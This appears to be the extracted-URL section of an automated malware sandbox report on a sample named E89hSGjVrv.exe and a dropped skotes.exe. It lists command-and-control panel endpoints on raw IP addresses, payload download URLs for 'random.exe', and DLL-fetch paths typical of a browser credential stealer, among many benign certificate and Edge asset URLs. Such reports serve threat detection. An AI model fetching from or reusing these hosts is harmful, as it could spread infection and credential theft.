              Source: unknownHTTP traffic detected: POST /RST2.srf HTTP/1.0Connection: Keep-AliveContent-Type: application/soap+xmlAccept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})Content-Length: 3592Host: login.live.com
              Source: E89hSGjVrv.exe, 00000000.00000002.2593879213.0000000001612000.00000004.00000020.00020000.00000000.sdmp, E89hSGjVrv.exe, 00000000.00000002.2593879213.0000000001641000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/mine/random.exe
              Source: E89hSGjVrv.exe, 00000000.00000002.2593879213.00000000015CE000.00000004.00000020.00020000.00000000.sdmp, E89hSGjVrv.exe, 00000000.00000002.2588765991.0000000000C05000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://185.215.113.206
              Source: E89hSGjVrv.exe, 00000000.00000002.2593879213.0000000001627000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/
              Source: E89hSGjVrv.exe, 00000000.00000002.2593879213.0000000001627000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/68b591d6548ec281/freebl3.dllK
              Source: E89hSGjVrv.exe, 00000000.00000002.2593879213.0000000001627000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/68b591d6548ec281/freebl3.dllo
              Source: E89hSGjVrv.exe, 00000000.00000002.2593879213.0000000001627000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/68b591d6548ec281/mozglue.dll
              Source: E89hSGjVrv.exe, 00000000.00000002.2593879213.0000000001627000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/68b591d6548ec281/msvcp140.dll
              Source: E89hSGjVrv.exe, 00000000.00000002.2593879213.0000000001627000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/68b591d6548ec281/nss3.dll
              Source: E89hSGjVrv.exe, 00000000.00000002.2593879213.0000000001627000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/68b591d6548ec281/nss3.dllO
              Source: E89hSGjVrv.exe, 00000000.00000002.2593879213.0000000001627000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/68b591d6548ec281/softokn3.dll
              Source: E89hSGjVrv.exe, 00000000.00000002.2593879213.0000000001627000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/68b591d6548ec281/softokn3.dllRq
              Source: E89hSGjVrv.exe, 00000000.00000002.2593879213.0000000001627000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/68b591d6548ec281/sqlite3.dll
              Source: E89hSGjVrv.exe, 00000000.00000002.2593879213.0000000001641000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/68b591d6548ec281/vcruntime140.dll
              Source: E89hSGjVrv.exe, 00000000.00000002.2593879213.0000000001641000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/68b591d6548ec281/vcruntime140.dlld
              Source: E89hSGjVrv.exe, 00000000.00000002.2593879213.0000000001627000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.php
              Source: E89hSGjVrv.exe, 00000000.00000002.2593879213.0000000001612000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.php2
              Source: E89hSGjVrv.exe, 00000000.00000002.2593879213.0000000001641000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpBrowser
              Source: E89hSGjVrv.exe, 00000000.00000002.2593879213.0000000001641000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpd
              Source: E89hSGjVrv.exe, 00000000.00000002.2588765991.0000000000C05000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpion:
              Source: E89hSGjVrv.exe, 00000000.00000002.2617610604.0000000023EF1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpp
              Source: E89hSGjVrv.exe, 00000000.00000002.2588765991.0000000000C05000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://185.215.113.206lfons
              Source: skotes.exe, 00000018.00000002.3301990970.0000000000C28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php
              Source: skotes.exe, 00000018.00000002.3301990970.0000000000C28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php#
              Source: skotes.exe, 00000018.00000002.3301990970.0000000000C28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php7
              Source: skotes.exe, 00000018.00000002.3301990970.0000000000C28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpe
              Source: skotes.exe, 00000018.00000002.3301990970.0000000000C28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://31.41.244.11/
              Source: skotes.exe, 00000018.00000002.3301990970.0000000000C28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://31.41.244.11//Zu7JuNko/index.php_
              Source: skotes.exe, 00000018.00000002.3301990970.0000000000C28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://31.41.244.11/215.113.43/Zu7JuNko/index.php
              Source: skotes.exe, 00000018.00000002.3301990970.0000000000C41000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000018.00000002.3301990970.0000000000C28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://31.41.244.11/files/random.exe
              Source: skotes.exe, 00000018.00000002.3301990970.0000000000C28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://31.41.244.11/files/random.exe$
              Source: skotes.exe, 00000018.00000002.3301990970.0000000000C28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://31.41.244.11/files/random.exe07797001
              Source: skotes.exe, 00000018.00000002.3301990970.0000000000C41000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://31.41.244.11/files/random.exe1
              Source: skotes.exe, 00000018.00000002.3301990970.0000000000C41000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://31.41.244.11/files/random.exe3b31d
              Source: skotes.exe, 00000018.00000002.3301990970.0000000000C28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://31.41.244.11/files/random.exe50623847
              Source: skotes.exe, 00000018.00000002.3301990970.0000000000C41000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://31.41.244.11/files/random.exeH
              Source: skotes.exe, 00000018.00000002.3301990970.0000000000C28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://31.41.244.11/files/random.exeW
              Source: skotes.exe, 00000018.00000002.3301990970.0000000000C28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://31.41.244.11/files/random.exephp
              Source: skotes.exe, 00000018.00000002.3301990970.0000000000C28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://31.41.244.11/files/random.exephpR
              Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
              Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
              Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
              Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
              Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
              Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
              Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
              Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
              Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
              Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
              Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
              Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
              Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
              Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
              Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://ocsp.digicert.com0
              Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://ocsp.digicert.com0A
              Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://ocsp.digicert.com0C
              Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://ocsp.digicert.com0N
              Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://ocsp.digicert.com0X
              Source: chromecache_467.4.drString found in binary or memory: http://www.broofa.com
              Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://www.digicert.com/CPS0
              Source: E89hSGjVrv.exe, 00000000.00000002.2625912416.000000006C57D000.00000002.00000001.01000000.0000000A.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.drString found in binary or memory: http://www.mozilla.com/en-US/blocklist/
              Source: E89hSGjVrv.exe, 00000000.00000002.2614646778.000000001DDA9000.00000004.00000020.00020000.00000000.sdmp, E89hSGjVrv.exe, 00000000.00000002.2625703272.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.sqlite.org/copyright.html.
              Source: E89hSGjVrv.exe, 00000000.00000003.2265234379.0000000001680000.00000004.00000020.00020000.00000000.sdmp, BFBGDGID.0.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: chromecache_467.4.drString found in binary or memory: https://apis.google.com
              Source: 2cc80dabc69f58b6_1.8.drString found in binary or memory: https://assets.msn.cn/resolver/
              Source: 2cc80dabc69f58b6_1.8.drString found in binary or memory: https://assets.msn.com/resolver/
              Source: d26454f9-efdb-4082-a4ed-6c5e60c7ffb4.tmp.8.drString found in binary or memory: https://bard.google.com/
              Source: 2cc80dabc69f58b6_1.8.drString found in binary or memory: https://bit.ly/wb-precache
              Source: E89hSGjVrv.exe, 00000000.00000002.2617610604.0000000023EF1000.00000004.00000020.00020000.00000000.sdmp, IDHIEBAAKJDHIECAAFHC.0.drString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
              Source: E89hSGjVrv.exe, 00000000.00000002.2617610604.0000000023EF1000.00000004.00000020.00020000.00000000.sdmp, IDHIEBAAKJDHIECAAFHC.0.drString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta
              Source: 2cc80dabc69f58b6_1.8.drString found in binary or memory: https://browser.events.data.msn.cn/
              Source: 2cc80dabc69f58b6_1.8.drString found in binary or memory: https://browser.events.data.msn.com/
              Source: Reporting and NEL.9.drString found in binary or memory: https://bzib.nelreports.net/api/report?cat=bingbusiness
              Source: 2cc80dabc69f58b6_1.8.drString found in binary or memory: https://c.msn.com/
              Source: E89hSGjVrv.exe, 00000000.00000003.2265234379.0000000001680000.00000004.00000020.00020000.00000000.sdmp, BFBGDGID.0.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: E89hSGjVrv.exe, 00000000.00000003.2361209484.0000000023E9C000.00000004.00000020.00020000.00000000.sdmp, E89hSGjVrv.exe, 00000000.00000003.2265234379.0000000001680000.00000004.00000020.00020000.00000000.sdmp, BFBGDGID.0.dr, Web Data.8.dr, GIJJKKJJ.0.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
              Source: E89hSGjVrv.exe, 00000000.00000003.2361209484.0000000023E9C000.00000004.00000020.00020000.00000000.sdmp, E89hSGjVrv.exe, 00000000.00000003.2265234379.0000000001680000.00000004.00000020.00020000.00000000.sdmp, BFBGDGID.0.dr, Web Data.8.dr, GIJJKKJJ.0.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: manifest.json0.8.drString found in binary or memory: https://chrome.google.com/webstore/
              Source: manifest.json0.8.drString found in binary or memory: https://chromewebstore.google.com/
              Source: 65b2e2f6-2ba1-45bc-a9fc-41502c757161.tmp.9.dr, c62db682-f42b-41cc-9a70-92ebc86ac696.tmp.9.drString found in binary or memory: https://clients2.google.com
              Source: manifest.json.8.drString found in binary or memory: https://clients2.google.com/service/update2/crx
              Source: 65b2e2f6-2ba1-45bc-a9fc-41502c757161.tmp.9.dr, c62db682-f42b-41cc-9a70-92ebc86ac696.tmp.9.drString found in binary or memory: https://clients2.googleusercontent.com
              Source: E89hSGjVrv.exe, 00000000.00000002.2617610604.0000000023EF1000.00000004.00000020.00020000.00000000.sdmp, IDHIEBAAKJDHIECAAFHC.0.drString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
              Source: E89hSGjVrv.exe, 00000000.00000002.2617610604.0000000023EF1000.00000004.00000020.00020000.00000000.sdmp, IDHIEBAAKJDHIECAAFHC.0.drString found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
              Source: 2cc80dabc69f58b6_0.8.drString found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
              Source: manifest.json.8.drString found in binary or memory: https://docs.google.com/
              Source: manifest.json.8.drString found in binary or memory: https://drive-autopush.corp.google.com/
              Source: manifest.json.8.drString found in binary or memory: https://drive-daily-0.corp.google.com/
              Source: manifest.json.8.drString found in binary or memory: https://drive-daily-1.corp.google.com/
              Source: manifest.json.8.drString found in binary or memory: https://drive-daily-2.corp.google.com/
              Source: manifest.json.8.drString found in binary or memory: https://drive-daily-3.corp.google.com/
              Source: manifest.json.8.drString found in binary or memory: https://drive-daily-4.corp.google.com/
              Source: manifest.json.8.drString found in binary or memory: https://drive-daily-5.corp.google.com/
              Source: manifest.json.8.drString found in binary or memory: https://drive-daily-6.corp.google.com/
              Source: manifest.json.8.drString found in binary or memory: https://drive-preprod.corp.google.com/
              Source: manifest.json.8.drString found in binary or memory: https://drive-staging.corp.google.com/
              Source: manifest.json.8.drString found in binary or memory: https://drive.google.com/
              Source: E89hSGjVrv.exe, 00000000.00000003.2361209484.0000000023E9C000.00000004.00000020.00020000.00000000.sdmp, E89hSGjVrv.exe, 00000000.00000003.2265234379.0000000001680000.00000004.00000020.00020000.00000000.sdmp, BFBGDGID.0.dr, Web Data.8.dr, GIJJKKJJ.0.drString found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: E89hSGjVrv.exe, 00000000.00000003.2361209484.0000000023E9C000.00000004.00000020.00020000.00000000.sdmp, E89hSGjVrv.exe, 00000000.00000003.2265234379.0000000001680000.00000004.00000020.00020000.00000000.sdmp, BFBGDGID.0.dr, Web Data.8.dr, GIJJKKJJ.0.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: E89hSGjVrv.exe, 00000000.00000003.2361209484.0000000023E9C000.00000004.00000020.00020000.00000000.sdmp, E89hSGjVrv.exe, 00000000.00000003.2265234379.0000000001680000.00000004.00000020.00020000.00000000.sdmp, BFBGDGID.0.dr, Web Data.8.dr, GIJJKKJJ.0.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: 65b2e2f6-2ba1-45bc-a9fc-41502c757161.tmp.9.drString found in binary or memory: https://edgeassetservice.azureedge.net
              Source: 000003.log6.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/addressbar_uu_files.en-gb/1.0.2/asset?sv=2017-07-29&sr
              Source: 000003.log6.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/arbitration_priority_list/4.0.5/asset?assetgroup=Arbit
              Source: 000003.log6.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/arbitration_priority_list/4.0.5/asset?sv=2017-07-29&sr
              Source: 000003.log7.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/domains_config_gz/2.8.76/asset?assetgroup=EntityExtrac
              Source: d26454f9-efdb-4082-a4ed-6c5e60c7ffb4.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_163_music.png/1.0.3/asset
              Source: d26454f9-efdb-4082-a4ed-6c5e60c7ffb4.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_M365_dark.png/1.7.32/asset
              Source: d26454f9-efdb-4082-a4ed-6c5e60c7ffb4.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_M365_hc.png/1.7.32/asset
              Source: HubApps Icons.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_M365_light.png/1.7.32/asset
              Source: d26454f9-efdb-4082-a4ed-6c5e60c7ffb4.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_action_center_hc.png/1.2.1/asset
              Source: d26454f9-efdb-4082-a4ed-6c5e60c7ffb4.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_action_center_maximal_dark.png/1.2.1/ass
              Source: HubApps Icons.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_action_center_maximal_light.png/1.2.1/as
              Source: d26454f9-efdb-4082-a4ed-6c5e60c7ffb4.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_amazon_music_light.png/1.4.13/asset
              Source: d26454f9-efdb-4082-a4ed-6c5e60c7ffb4.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_apple_music.png/1.4.12/asset
              Source: d26454f9-efdb-4082-a4ed-6c5e60c7ffb4.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_bard_light.png/1.0.1/asset
              Source: d26454f9-efdb-4082-a4ed-6c5e60c7ffb4.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_dark.png/1.1.17/asset
              Source: d26454f9-efdb-4082-a4ed-6c5e60c7ffb4.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_dark.png/1.6.8/asset
              Source: d26454f9-efdb-4082-a4ed-6c5e60c7ffb4.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_light.png/1.1.17/asset
              Source: d26454f9-efdb-4082-a4ed-6c5e60c7ffb4.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_light.png/1.6.8/asset
              Source: d26454f9-efdb-4082-a4ed-6c5e60c7ffb4.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_hc.png/1.1.17/asset
              Source: d26454f9-efdb-4082-a4ed-6c5e60c7ffb4.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_hc.png/1.6.8/asset
              Source: d26454f9-efdb-4082-a4ed-6c5e60c7ffb4.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_collections_hc.png/1.0.3/asset
              Source: d26454f9-efdb-4082-a4ed-6c5e60c7ffb4.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_collections_maximal_dark.png/1.0.3/asset
              Source: d26454f9-efdb-4082-a4ed-6c5e60c7ffb4.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_collections_maximal_light.png/1.0.3/asse
              Source: d26454f9-efdb-4082-a4ed-6c5e60c7ffb4.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_deezer.png/1.4.12/asset
              Source: d26454f9-efdb-4082-a4ed-6c5e60c7ffb4.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_demo_dark.png/1.0.6/asset
              Source: d26454f9-efdb-4082-a4ed-6c5e60c7ffb4.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_demo_light.png/1.0.6/asset
              Source: d26454f9-efdb-4082-a4ed-6c5e60c7ffb4.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_designer_color.png/1.0.14/asset
              Source: d26454f9-efdb-4082-a4ed-6c5e60c7ffb4.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_designer_hc.png/1.0.14/asset
              Source: d26454f9-efdb-4082-a4ed-6c5e60c7ffb4.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_edrop_hc.png/1.1.12/asset
              Source: d26454f9-efdb-4082-a4ed-6c5e60c7ffb4.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_edrop_maximal_dark.png/1.1.12/asset
              Source: d26454f9-efdb-4082-a4ed-6c5e60c7ffb4.tmp.8.dr, HubApps Icons.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_edrop_maximal_light.png/1.1.12/asset
              Source: d26454f9-efdb-4082-a4ed-6c5e60c7ffb4.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_etree_hc.png/1.2.0/asset
              Source: d26454f9-efdb-4082-a4ed-6c5e60c7ffb4.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_etree_maximal_dark.png/1.2.0/asset
              Source: d26454f9-efdb-4082-a4ed-6c5e60c7ffb4.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_etree_maximal_light.png/1.2.0/asset
              Source: d26454f9-efdb-4082-a4ed-6c5e60c7ffb4.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_excel.png/1.7.32/asset
              Source: d26454f9-efdb-4082-a4ed-6c5e60c7ffb4.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_facebook_messenger.png/1.5.14/asset
              Source: d26454f9-efdb-4082-a4ed-6c5e60c7ffb4.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_gaana.png/1.0.3/asset
              Source: d26454f9-efdb-4082-a4ed-6c5e60c7ffb4.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_hc.png/1.7.1/asset
              Source: d26454f9-efdb-4082-a4ed-6c5e60c7ffb4.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_hc_controller.png/1.7.1/asset
              Source: d26454f9-efdb-4082-a4ed-6c5e60c7ffb4.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_hc_joystick.png/1.7.1/asset
              Source: d26454f9-efdb-4082-a4ed-6c5e60c7ffb4.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_dark.png/1.7.1/asset
              Source: d26454f9-efdb-4082-a4ed-6c5e60c7ffb4.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_dark_controller.png/1.7.1/
              Source: d26454f9-efdb-4082-a4ed-6c5e60c7ffb4.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_dark_joystick.png/1.7.1/as
              Source: HubApps Icons.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_light.png/1.7.1/asset
              Source: d26454f9-efdb-4082-a4ed-6c5e60c7ffb4.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_light_controller.png/1.7.1
              Source: d26454f9-efdb-4082-a4ed-6c5e60c7ffb4.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_light_joystick.png/1.7.1/a
              Source: d26454f9-efdb-4082-a4ed-6c5e60c7ffb4.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_gmail.png/1.5.4/asset
              Source: d26454f9-efdb-4082-a4ed-6c5e60c7ffb4.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_help.png/1.0.0/asset
              Source: d26454f9-efdb-4082-a4ed-6c5e60c7ffb4.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_history_hc.png/0.1.3/asset
              Source: d26454f9-efdb-4082-a4ed-6c5e60c7ffb4.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_history_maximal_dark.png/0.1.3/asset
              Source: d26454f9-efdb-4082-a4ed-6c5e60c7ffb4.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_history_maximal_light.png/0.1.3/asset
